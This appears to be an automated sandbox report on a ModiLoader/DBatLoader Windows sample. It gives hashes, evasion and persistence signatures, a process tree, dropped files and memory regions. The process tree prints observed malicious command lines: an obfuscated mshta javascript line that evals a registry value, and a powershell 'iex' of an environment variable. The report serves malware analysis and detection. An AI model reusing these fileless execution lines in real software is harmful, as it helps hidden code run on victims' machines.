Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    04-05-2024 08:26

General

  • Target

    11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe

  • Size

    265KB

  • MD5

    11e27faa8cf80aa4d6b08e31845211ff

  • SHA1

    8e2706830d2f3d04f66746a342a5920a1ca04d76

  • SHA256

    a49fa2fd171c274cfcdf1275eeee73052ac43e233951fdd84a1e2f9a8db57614

  • SHA512

    c026e87bb28c505a37f41614f2d03690d3b7ff7c986483bb4f4aafe75cd9d466f4759080eebe4006fe6d6424b6fb2214c2a70c48f86b43f6f3f1263cfae8614e

  • SSDEEP

    6144:veX94nYY+uUMFemOFu3Ksm2Yn+EE9j+ivEyPYxJQeH:OSnYPweZnl+EER+iv6IeH

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 59 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"
      2⤵
        PID:2820
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:fTMkICz02="KJH";q2Z2=new%20ActiveXObject("WScript.Shell");iQ52hSU="eO";UuY82n=q2Z2.RegRead("HKLM\\software\\Wow6432Node\\0HNGvqG\\uRVsRh");Kf1gAyM="M3Bs1gPW";eval(UuY82n);N4DE8v="C";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:gqsp
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1972
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2156
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:1176

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\d3afae00\52d5d4d8.73caeeca8

        Filesize

        25KB

        MD5

        1c22f4412dd3f7741dae7b79ae8895d2

        SHA1

        e4dc8792c2e2d61260f36483de74a36f6560b669

        SHA256

        237194b26426c690be3a630dfcfd81cd53a41630a131308e748b47674e1e403d

        SHA512

        dda72964884e71f251753046b5c67764a7cb6fbd3f5a344316e4030203e9d1c84a2dc3bb5fb251663d884106e9ff1505c7f3b1f1a1d4bee4f5f8f0a262fe4a1c

      • C:\Users\Admin\AppData\Local\d3afae00\9a86c6c3.lnk

        Filesize

        897B

        MD5

        b5a308dbaa0f4ae2ba712c72979b0e4f

        SHA1

        ea6270ac97809e3388adb25eca2b7a0f68ad8c55

        SHA256

        07df68df30334d44408ad1fa3e94d759270bdc1b17a9b494aa59dd43605e9482

        SHA512

        3e3ff80778838b0078b8dc4bc7fb60b6d1cf374f8cda491b2d32805650d5c1a61f026bad431f326d116b73cc2c5fce36871811a5e9cedcabf3c0d5305b7f612d

      • C:\Users\Admin\AppData\Local\d3afae00\d2239679.bat

        Filesize

        67B

        MD5

        f2ae417dcfcbe11a00d1102e6b587247

        SHA1

        0078bd4798af0b8a717425f1a85a1ff2a70c4c37

        SHA256

        0dc66bcd192c0da909958e43407fb9c4eb212c0471e715e32555f9399549255b

        SHA512

        8fd8d7af58ce744f505ec537830104bab71f86e87f7184bb6f0b699c8eed5f68ffd97211c435771b76aae94c8a74f782b656923c0f61f7189349b744d76f7dea

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk

        Filesize

        999B

        MD5

        d6891377644b9dade40d05709cfffd78

        SHA1

        ce2ea83ec89887753e40da3a5bede59b16f7b747

        SHA256

        4e5f6bc7bd7163394d29bd76b1b2656cfa8372c53a1d9a58ccf39f419e50e601

        SHA512

        9510eefa9b344e2538c62688c9b866f5b617934408d8395450edec71b00ac7be09f817ad7d7f61d23c1912cca01e0d1dae3a139bdfe1755f4149e01bbf76ccd7

      • C:\Users\Admin\AppData\Roaming\e00a3efa\fe73a489.73caeeca8

        Filesize

        41KB

        MD5

        281f7199a0402dbe5e6c7a1bfe6c6c52

        SHA1

        a75cb62a9e7d66852f2ff727700f712324616c87

        SHA256

        4414d7e248aaeefe3a00e0e3d585e78ff8509391b1448b913d6a27a8d601e502

        SHA512

        4fa8f59d085d12bf24e26ba44df90b2993269ef1a8a600c6a0c383552a0590592f78d59c370628c84eae1db2595e4b25776a9385309a0d80b4b404be9bf9d7f1

      • memory/1176-73-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-71-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-80-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-68-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-69-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-67-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-70-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-77-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-72-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-81-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-79-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-74-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-75-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-76-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-78-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1972-21-0x0000000006160000-0x0000000006236000-memory.dmp

        Filesize

        856KB

      • memory/1972-24-0x0000000002F70000-0x0000000004F70000-memory.dmp

        Filesize

        32.0MB

      • memory/1972-26-0x0000000006160000-0x0000000006236000-memory.dmp

        Filesize

        856KB

      • memory/2156-29-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-30-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-59-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-57-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-56-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-55-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-54-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-44-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-43-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-42-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-41-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-40-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-66-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-38-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-37-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-36-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-35-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-34-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-33-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-32-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-31-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-49-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-58-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-45-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-48-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-47-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-46-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-39-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-23-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-28-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-27-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-25-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2820-2-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2820-12-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-11-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-8-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-10-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-9-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-7-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-6-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-5-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2820-4-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB